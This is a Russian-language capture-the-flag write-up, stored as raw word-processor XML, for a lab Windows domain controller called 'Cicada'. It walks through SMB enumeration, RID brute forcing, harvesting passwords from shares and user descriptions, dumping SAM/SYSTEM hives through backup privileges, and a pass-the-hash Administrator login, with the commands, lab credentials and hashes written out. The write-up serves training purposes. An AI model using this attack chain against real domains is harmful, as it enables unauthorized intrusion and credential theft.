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Cicada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 xml:space="preserve">IP адрес уязвимой машины Cicada – 10.10.11.35 , мой IP адрес – 10.10.11.35. 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начала я добавил IP адрес цели в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>файл /etc/hosts</w:t>
      </w:r>
      <w:r>
        <w:rPr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389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3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Моим следующим шагом является сбор информации о цели. Я начал сразу с активного сканирования. Для этого я использовал инструмент nmap, ввел команду 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nmap -sS -sV --top-ports=10000 -T4 -vv -oN CicadaNmapScan.nmap cicada.htb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получил следующие результаты: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97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Открытые порты, запущенные на них службы и сервисы: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PORT</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>SERVICE</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>VERSION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53/tcp</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">domain        </w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Simple DNS Plus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88/tcp</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">kerberos-sec  </w:t>
        <w:tab/>
        <w:t>Microsoft Windows Kerberos (server time: 2024-12-02 23:32:54Z)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135/tcp</w:t>
        <w:tab/>
        <w:t xml:space="preserve">msrpc         </w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Microsoft Windows RPC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139/tcp</w:t>
        <w:tab/>
        <w:t xml:space="preserve">netbios-ssn   </w:t>
        <w:tab/>
        <w:t>Microsoft Windows netbios-ssn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389/tcp</w:t>
        <w:tab/>
        <w:t xml:space="preserve">ldap          </w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Microsoft Windows Active Directory LDAP (Domain: cicada.htb0.,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445/tcp</w:t>
        <w:tab/>
        <w:t xml:space="preserve">microsoft-ds? </w:t>
        <w:tab/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464/tcp</w:t>
        <w:tab/>
        <w:t xml:space="preserve">kpasswd5?     </w:t>
        <w:tab/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593/tcp</w:t>
        <w:tab/>
        <w:t xml:space="preserve">ncacn_http    </w:t>
        <w:tab/>
        <w:t>Microsoft Windows RPC over HTTP 1.0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636/tcp</w:t>
        <w:tab/>
        <w:t xml:space="preserve">ssl/ldap      </w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Microsoft Windows Active Directory LDAP (Domain: cicada.htb0.,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3268/tcp</w:t>
        <w:tab/>
        <w:t xml:space="preserve">ldap          </w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Microsoft Windows Active Directory LDAP (Domain: cicada.htb0.,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3269/tcp</w:t>
        <w:tab/>
        <w:t xml:space="preserve">ssl/ldap      </w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)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5985/tcp</w:t>
        <w:tab/>
        <w:t xml:space="preserve">http          </w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)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На данной машине открыты </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>139,445 порты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а это значит, что, во-первых, операционной системой является Microsoft Windows, во-вторых, на портах запущена samba служба. Отталкиваясь от второго, я начал исследование портов. Для этого я использовал инструмент </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>smbclient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. Для начала я узнал обо всех доступных ресурсах. Для этого использовал команду </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">smbclient -L //10.10.11.35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получил результаты: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65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На ресурсе HR я нашел текстовый файл. Данный файл содержал такую информацию, как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>пароль по умолчанию – Cicada$M6Corpb*@Lp#nZp!8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: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65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389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3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Итак, у меня есть пароль, но нету имени пользователя. Продолжаю разведку и перечисление. Сейчас я буду использовать инструмент </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>enum4linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. Я надеялся получить информацию об пользователях, но не получилось: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389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3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018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Продолжаю поиск пользователей. Воспользовавшись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статьей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командой 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nxc smb 10.10.11.35 -u "anonymous" -p "" --rid-brute 3000,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 помощью инструмента </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>nxc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, мне удалось перечислить пользователей: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018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Текстовый результат команды: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[*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)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[+] cicada.htb\anonymous: (Guest)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498: CICADA\Enterprise Read-only Domain Controllers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500: CICADA\Administrator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501: CICADA\Guest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502: CICADA\krbtgt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512: CICADA\Domain Admins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513: CICADA\Domain Users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514: CICADA\Domain Guests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515: CICADA\Domain Computers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516: CICADA\Domain Controllers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517: CICADA\Cert Publishers (SidTypeAlias)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518: CICADA\Schema Admins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519: CICADA\Enterprise Admins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520: CICADA\Group Policy Creator Owners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521: CICADA\Read-only Domain Controllers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522: CICADA\Cloneable Domain Controllers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525: CICADA\Protected Users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526: CICADA\Key Admins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527: CICADA\Enterprise Key Admins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553: CICADA\RAS and IAS Servers (SidTypeAlias)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571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)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572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)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1000: CICADA\CICADA-DC$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1101: CICADA\DnsAdmins (SidTypeAlias)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1102: CICADA\DnsUpdateProxy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1103: CICADA\Groups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1104: CICADA\john.smoulder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1105: CICADA\sarah.dantelia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1106: CICADA\michael.wrightson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1108: CICADA\david.orelious (SidTypeUser)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1109: CICADA\Dev Support (SidTypeGroup)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SMB         10.10.11.35     445    CICADA-DC        1601: CICADA\emily.oscars (SidTypeUser)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Перебирая всех пользователей с меточкой </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SidTypeUser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(результат принес пользователь </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>michael.wrightson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), при помощи пароля по умолчанию, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>enum4linux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команды </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>enum4linux -A -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' 10.10.11.35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я узнал, что в системе присутствует такой пользователь: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018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При помощи инструмента </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>rpcclient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а также добытых учетных данных при помощи команды </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">rpcclient -U "michael.wrightson" 10.10.11.35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я смог подключиться к серверу. После изучения справки я воспользовался командой </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">getusername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- получил всех пользователей системы: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8557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Текстовый резуль</w:t>
        <w:tab/>
        <w:t>тат команды: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user:[Administrator] rid:[0x1f4]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user:[Guest] rid:[0x1f5]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user:[krbtgt] rid:[0x1f6]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user:[john.smoulder] rid:[0x450]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user:[sarah.dantelia] rid:[0x451]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user:[michael.wrightson] rid:[0x452]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user:[david.orelious] rid:[0x454]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user:[emily.oscars] rid:[0x641]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>[</w:t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Команда </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">querydispinfo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отображает более подробную информацию об пользователе. В данном случае, я нашел пароль пользователя </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>david.orelious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aRt$Lp#7t*VQ!3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293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С помощью учетных данных </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">david.orelious </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>я наконец-то смог получить доступ к ресурсу DEV, скопировал его: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018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Данный скрипт делает резервную копию директории </w:t>
      </w:r>
      <w:hyperlink r:id="rId15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C:\tmp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 </w:t>
      </w:r>
      <w:hyperlink r:id="rId16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D:\Backup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. Самое интересное здесь – пароль учетной записи. Так были найдены новые валидные данные: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">emily.oscars – </w:t>
      </w:r>
      <w:hyperlink r:id="rId17">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:b/>
            <w:bCs/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>Q!3@Lp</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">#M6b*7t*Vt </w:t>
      </w:r>
      <w:r>
        <w:rPr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018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С помощью этих данных можно подключиться к ресурсу ADMIN$, но никакой пользы от этого нет. Прочитав ещё одну </w:t>
      </w:r>
      <w:hyperlink r:id="rId1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статью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>, я решил попробовать.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Подошли учетные данные </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>emily.oscars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. После использования команды </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>evil-winrm -i 10.10.11.35 -u "emily.oscars" -p "Q\</w:t>
      </w:r>
      <w:hyperlink r:id="rId20">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:b/>
            <w:bCs/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>!3@Lp</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">#M6b*7t*Vt"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я был подключен к директории </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\Users\emily.oscars.CICADA\Documents </w:t>
      </w:r>
      <w:r>
        <w:rPr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018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В директории </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\Users\emily.oscars.CICADA\Desktop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находился пользовательский флаг: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8089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Пользовательский флаг: 8e497af5d898996a18d1c8a486140f25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 папке </w:t>
      </w:r>
      <w:hyperlink r:id="rId23">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:b/>
            <w:bCs/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>C:\Temp</w:t>
        </w:r>
      </w:hyperlink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лежит два файла: sam и system. Они предназначены для хранения информации реестра Windows. Алгоритм повышения привелегий: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Команды </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">whoami /all или whoami /privs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покажут, какими привелегиями обладает пользователь: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188404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 данном случае у эмили есть права на создание резервных копий.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Команды </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>reg save hklm\sam C:\Temp\sam.hive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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">reg save hklm\system C:\Temp\system.hive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создают резервные копии хранилищ и сохраняют их в папке </w:t>
      </w:r>
      <w:hyperlink r:id="rId25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C:\Temp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>;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Команды </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">download sam.hive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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">download system.hive </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>скачивают файлы на машину атакующего.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Инструмент </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>pytpykatz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позволяет работать с паролями и средой Windows. Команда </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">pypykatz registry --sam sam.hive system.hive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извлекает записи о пользователях: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208026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При помощи команды </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>evil-winrm -i 10.10.11.35 -u "Administrator" -H "2b87e7c93a3e8a0ea4a581937016f341"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я вхожу в систему как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28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без использования пароля.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Теперь у меня есть доступ администратора. Осталось забрать рутовый флаг.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261239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Флаг root: 3e79a70fe163820966c40ae1fb927776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36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Задание Выполнено !!!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omment">
    <w:name w:val="Comment"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="56" w:after="0"/>
      <w:ind w:start="56" w:end="56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netexec.wiki/getting-started/using-modules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../../../../../../C:/tmp" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="../../../../../../D:/Backup" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:Q!3@Lp" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://habr.com/ru/companies/otus/articles/826068/" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:!3@Lp" TargetMode="Externa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yperlink" Target="../../../../../../C:/Temp" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="../../../../../../C:/Temp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LibreOffice/24.8.3.2$Linux_X86_64 LibreOffice_project/480$Build-2</Application>
  <AppVersion>15.0000</AppVersion>
  <Pages>13</Pages>
  <Words>939</Words>
  <Characters>6739</Characters>
  <CharactersWithSpaces>8389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2024-12-02T19:33:32Z</dcterms:created>
  <dc:creator/>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-12-02T23:12:22Z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